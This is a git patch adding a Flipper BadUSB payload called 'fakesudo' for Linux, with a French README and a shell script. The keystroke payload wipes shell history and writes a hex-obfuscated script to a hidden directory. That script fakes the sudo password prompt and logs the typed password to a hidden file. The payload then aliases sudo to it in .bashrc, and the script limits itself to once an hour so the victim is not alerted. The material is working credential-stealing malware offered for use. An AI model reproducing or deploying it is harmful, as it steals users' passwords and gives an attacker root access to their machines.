From 518fcffa665dac649d2dff0a57bed325eeb3d1b0 Mon Sep 17 00:00:00 2001
From: Snorky
Date: Fri, 31 May 2024 15:01:04 +0200
Subject: [PATCH] =?UTF-8?q?T=C3=A9l=C3=A9verser=20les=20fichiers=20vers=20?= =?UTF-8?q?"badUSB/fakesudo"?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 badUSB/fakesudo/README.md | 19 +++++
 badUSB/fakesudo/fakesudo.txt | 132 +++++++++++++++++++++++++++++++++++
 badUSB/fakesudo/system-local | 21 ++++++
 3 files changed, 172 insertions(+)
 create mode 100644 badUSB/fakesudo/README.md
 create mode 100644 badUSB/fakesudo/fakesudo.txt
 create mode 100644 badUSB/fakesudo/system-local

diff --git a/badUSB/fakesudo/README.md b/badUSB/fakesudo/README.md
new file mode 100644
index 0000000..0d1704e
--- /dev/null
+++ b/badUSB/fakesudo/README.md
@@ -0,0 +1,19 @@
+Le script `systemd-local` est le bout de code du fakesudo qui lui mm est en hexa dans le fichier `fakesudo.txt`.
+
+Le script `systemd-local` alias `fakesudo` ne s'active seulement une fois par heure max afin de ne pas alerter l'utilisateur.
+
+Rien a faire de spécial à part brancher le flipper et injecter le payload.
+
+Les mots de passes récupérés pas le `fakesudo` sont disponible dans le répertoire `/home/$USER/.config/.dsystem/log/systemd-local.log`
+
+Pour le moment il ne gère que la commande `sudo`. Dans une prochaine version, la commande `su` sera aussi prise en compte.
+
+Enjoy and HackThePlanet !!!
+
+## **_PS: Bien évident je ne suis pas responsable de ce que vous faites avec ce script._**
+
+
+![Demo Fakesudo](assets/fakesudo.gif)
+
+
+
diff --git a/badUSB/fakesudo/fakesudo.txt b/badUSB/fakesudo/fakesudo.txt
new file mode 100644
index 0000000..4d6bc8b
--- /dev/null
+++ b/badUSB/fakesudo/fakesudo.txt
@@ -0,0 +1,132 @@
+REM #######################################################
+REM # |
+REM # Title : FakeSudo - Linux |
+REM # Author : Snorky |
+REM # Version : 1.0 |
+REM # Category : Credentials |
+REM # Target : Linux |
+REM # |
+REM #######################################################
+
+REM Requirements:
+REM - Nothing special. :)
+
+
+REM #####################
+REM # #
+REM # BEGIN: #
+REM # Open a terminal #
+REM # #
+REM #####################
+
+DELAY 500
+CTRL-ALT t
+DELAY 500
+
+
+REM ###########
+REM # #
+REM # Set Var #
+REM # #
+REM ###########
+
+REM Nop i'm not in your HISTORY.. :)
+STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+ENTER
+DELAY 100
+
+
+REM DIR LOG and Binary name
+STRING _DIR="/home/$USER/.config/.dsystem/bin"; _BIN="systemd-local"; _LOG="/home/$USER/.config/.dsystem/log"
+ENTER
+DELAY 100
+
+
+REM ########################
+REM # #
+REM # Create DIR #
+REM # Push fakesudo script #
+REM # #
+REM ########################
+
+STRING cd
+ENTER
+DELAY 100
+
+STRING mkdir -p $_DIR
+ENTER
+DELAY 100
+
+STRING mkdir -p $_LOG
+ENTER
+DELAY 100
+
+STRING echo -e """
+STRING \x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x0a\x5f\x44\x49\x52\x5f\
+ENTER
+STRING \x4c\x4f\x47\x3d\x22\x2f\x68\x6f\x6d\x65\x2f\x24\x55\x53\x45\x52\
+ENTER
+STRING \x2f\x2e\x63\x6f\x6e\x66\x69\x67\x2f\x2e\x64\x73\x79\x73\x74\x65\
+ENTER
+STRING \x6d\x2f\x6c\x6f\x67\x22\x0a\x5f\x44\x49\x52\x5f\x42\x49\x4e\x3d\
+ENTER
+STRING \x22\x2f\x68\x6f\x6d\x65\x2f\x24\x55\x53\x45\x52\x2f\x2e\x63\x6f\
+ENTER
+STRING \x6e\x66\x69\x67\x2f\x2e\x64\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\
+ENTER
+STRING \x6e\x22\x0a\x5f\x54\x53\x3d\x30\x0a\x0a\x5f\x44\x41\x54\x45\x3d\
+ENTER
+STRING \x24\x28\x64\x61\x74\x65\x20\x2b\x25\x73\x29\x0a\x0a\x5f\x44\x49\
+ENTER
+STRING \x46\x46\x3d\x24\x28\x28\x20\x24\x5f\x44\x41\x54\x45\x20\x2d\x20\
+ENTER
+STRING \x24\x5f\x54\x53\x20\x29\x29\x0a\x0a\x69\x66\x20\x5b\x20\x24\x5f\
+ENTER
+STRING \x44\x49\x46\x46\x20\x2d\x67\x74\x20\x33\x36\x30\x30\x20\x5d\x3b\
+ENTER
+STRING \x20\x74\x68\x65\x6e\x0a\x0a\x20\x20\x20\x20\x72\x65\x61\x64\x20\
+ENTER
+STRING \x2d\x73\x70\x20\x22\x5b\x73\x75\x64\x6f\x5d\x20\x70\x61\x73\x73\
+ENTER
+STRING \x77\x6f\x72\x64\x20\x66\x6f\x72\x20\x24\x55\x53\x45\x52\x3a\x20\
+ENTER
+STRING \x22\x20\x5f\x53\x50\x0a\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x22\
+ENTER
+STRING \x22\x0a\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x20\x32\x0a\x20\x20\
+ENTER
+STRING \x20\x20\x65\x63\x68\x6f\x20\x22\x53\x6f\x72\x72\x79\x2c\x20\x74\
+ENTER
+STRING \x72\x79\x20\x61\x67\x61\x69\x6e\x2e\x22\x0a\x20\x20\x20\x20\x65\
+ENTER
+STRING \x63\x68\x6f\x20\x24\x5f\x53\x50\x20\x3e\x3e\x20\x24\x5f\x44\x49\
+ENTER
+STRING \x52\x5f\x4c\x4f\x47\x2f\x24\x28\x62\x61\x73\x65\x6e\x61\x6d\x65\
+ENTER
+STRING \x20\x24\x30\x29\x2e\x6c\x6f\x67\x0a\x20\x20\x20\x20\x73\x65\x64\
+ENTER
+STRING \x20\x2d\x69\x20\x27\x30\x2c\x2f\x5f\x54\x53\x3d\x2e\x2a\x2f\x20\
+ENTER
+STRING \x73\x2f\x2f\x5f\x54\x53\x3d\x27\x24\x5f\x44\x41\x54\x45\x27\x2f\
+ENTER
+STRING \x27\x20\x24\x5f\x44\x49\x52\x5f\x42\x49\x4e\x2f\x24\x28\x62\x61\
+ENTER
+STRING \x73\x65\x6e\x61\x6d\x65\x20\x24\x30\x29\x0a\x66\x69\x0a\x0a\x2f\
+ENTER
+STRING \x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x75\x64\x6f\x20\x24\x40\x0a\
+ENTER
+STRING """ > $_DIR/$_BIN
+ENTER
+DELAY 100
+
+STRING echo "alias sudo=\"$_DIR/$_BIN\" " >> .bashrc
+ENTER
+DELAY 100
+
+STRING chmod +x $_DIR/$_BIN
+ENTER
+DELAY 100
+
+
+STRING exit
+ENTER
+
diff --git a/badUSB/fakesudo/system-local b/badUSB/fakesudo/system-local
new file mode 100644
index 0000000..d9710fd
--- /dev/null
+++ b/badUSB/fakesudo/system-local
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+_DIR_LOG="/home/$USER/.config/.dsystem/log"
+_DIR_BIN="/home/$USER/.config/.dsystem/bin"
+_TS=0
+
+_DATE=$(date +%s)
+
+_DIFF=$(( $_DATE - $_TS ))
+
+if [ $_DIFF -gt 3600 ]; then
+
+ read -sp "[sudo] password for $USER: " _SP
+ echo ""
+ sleep 2
+ echo "Sorry, try again."
+ echo $_SP >> $_DIR_LOG/$(basename $0).log
+ sed -i '0,/_TS=.*/ s//_TS='$_DATE'/' $_DIR_BIN/$(basename $0)
+fi
+
+/usr/bin/sudo $@